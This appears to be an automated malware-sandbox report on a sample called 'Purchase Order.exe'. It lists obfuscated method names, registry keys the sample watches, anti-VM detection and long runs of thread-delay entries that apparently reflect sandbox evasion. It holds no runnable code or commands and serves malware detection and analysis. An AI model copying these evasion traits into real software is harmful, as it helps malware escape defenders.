Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, dwatSuHMe1qQvliJey.cs	High entropy of concatenated method names: 'o6qlJCYC05', 'J3ml5Fs92h', 'VTXlDkJeAT', 'UECl2SYdS3', 'ltalbQ6Jcj', 'FtqDCWTmTn', 'eOiDoN1R2j', 'IPNDuppopc', 'pBWDBrsfa0', 'iRaDOhY5Rn'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, VolHSssxIRWE0AycLQ.cs	High entropy of concatenated method names: 'RJ5r9IC07i', 'b7ZrQqdTt9', 'C6trUSsnFJ', 'nfIrq4XwJq', 'hbZr5s0PsC', 'OyRrDNQDZG', 'WUhrlNYeU2', 'Nyy3u9JwhX', 'dMv3BCgvlo', 'IUh3O9Ra48'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, YwUR0vWdBmCNu00DFo.cs	High entropy of concatenated method names: 'beV4MAgDPu', 'OyA4S0KfpZ', 'zRI4Hocl7M', 'NZH4YbcQgw', 'T2W4jqQfdw', 'XSw4m9qabx', 'eaN4KdrMo1', 'VM04pReKCq', 'qSF4GJGHR0', 'BpS4NElP8p'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, aOOOxadFB9Bng1Fk99.cs	High entropy of concatenated method names: 'xP72nkJCYZ', 'kuH2tYiVjD', 'Aac2war4CM', 'yan28KtEqd', 'vE52LFsWid', 'QZk2fgFGtx', 'pI62A6WFTo', 'uoK2MijTYX', 'Brm2S5VSbP', 'V6m2VXkeNQ'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, XxFjHXMucdrtqTOWBP.cs	High entropy of concatenated method names: 'r6V5i8uMtC', 'FNU51Gf7Qc', 'Hyt5hs8p2m', 'zVx5e4byt7', 'OA15Cqs50d', 'o385o61ALa', 'GKL5uqdONB', 'nWw5BSI9vL', 't1u5OkNGOM', 'TOi5sfCh2x'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, sMWB1oOcSfDcEGsrEo.cs	High entropy of concatenated method names: 'RaL3HypbgQ', 'l5P3YQiR9Z', 'cWb3XSYgle', 'm5m3jZCHEL', 'YOk3irS244', 'pB13mw13Cx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, XtyULeSecluK2WEKkB.cs	High entropy of concatenated method names: 'F4OE8shA3S', 'JYsEfw9fsy', 'wnDEMBME2M', 'MOcESJSlHK', 'KobEgBePNa', 'VK3EvMqSM5', 'PV4ET5ubXT', 'IgHE3PkTkI', 'CSLErGMV6U', 'APOEFYlhEk'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, FOrW3W5UUNYhKWNjPf.cs	High entropy of concatenated method names: 'Dispose', 'SoG9OgMiJh', 'E2fkY0Au3I', 'aLeUURJX9e', 'xs49sXXcdh', 'jD39zY2wV0', 'ProcessDialogKey', 'v9Fk7MWB1o', 'uSfk9DcEGs', 'rEokkoolHS'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, u1ytKukRLLd4g2nvo4.cs	High entropy of concatenated method names: 'nBpwbIIod', 'oHr8ZbU5Y', 'DLqfbmTY2', 'd7CATYFVY', 'XFUSaquiO', 'oO1V4CNPW', 'e0g8jGTqydhN100I9S', 'EVXN6ud1Gs7T9aoLMw', 'UHP3ISZfR', 'MMHFf6CEZ'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, BihELb9QnKSKCOgd75n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VyqFipqdSc', 'AgNF14XJs5', 'wh1FhuE0IP', 'BbZFeFOqOk', 'frsFCf3tPj', 'TPfFofFtpH', 'WbQFuNhQoX'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, adcXZhbMFM4fJQUs1b.cs	High entropy of concatenated method names: 'y6mQJDmITU', 'uHCQq6qZUY', 'f82Q5EMCwH', 'HFpQEq96TP', 'FoNQD8WPLN', 'IfRQlbImO6', 'LZEQ2pyCiG', 'q3AQba9E66', 'EN1QPk5ZVd', 'pBbQIehPAq'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, sbL4qKV2G32ksHUvGX.cs	High entropy of concatenated method names: 'RixDLGKKZw', 'o00DAb2kVT', 'oJtEXJGXo8', 'BhREjmV1c8', 'yf7EmjWpH1', 'S9MEZgvtOc', 'qO1EKXCHhG', 'DnAEpm48jH', 'tLaEdlF00Q', 'qsiEGwFXnq'
Source: 0.2.Purchase Order.exe.3a16900.8.raw.unpack, Vs3SJqUNwpqIpO9ISn.cs	High entropy of concatenated method names: 'ARB92xFjHX', 'Wcd9brtqTO', 'Tec9IluK2W', 'gKk96BFbL4', 'GUv9gGXQwa', 'zSu9vMe1qQ', 'Ov7D2El9bDMG2mVM1h', 'mCBmNTncR8cdd9efA9', 'S5w99BZoaR', 'o2a9QGtnEr'

Source: C:\Users\user\Desktop\Purchase Order.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR

Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 73E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 6BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 84E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 94E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 4F90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598729	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598293	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595135	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Window / User API: threadDelayed 8513			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Window / User API: threadDelayed 1337			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe TID: 180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 5884	Thread sleep count: 8513 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 5884	Thread sleep count: 1337 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598729s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595135s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599313	Jump to behavior
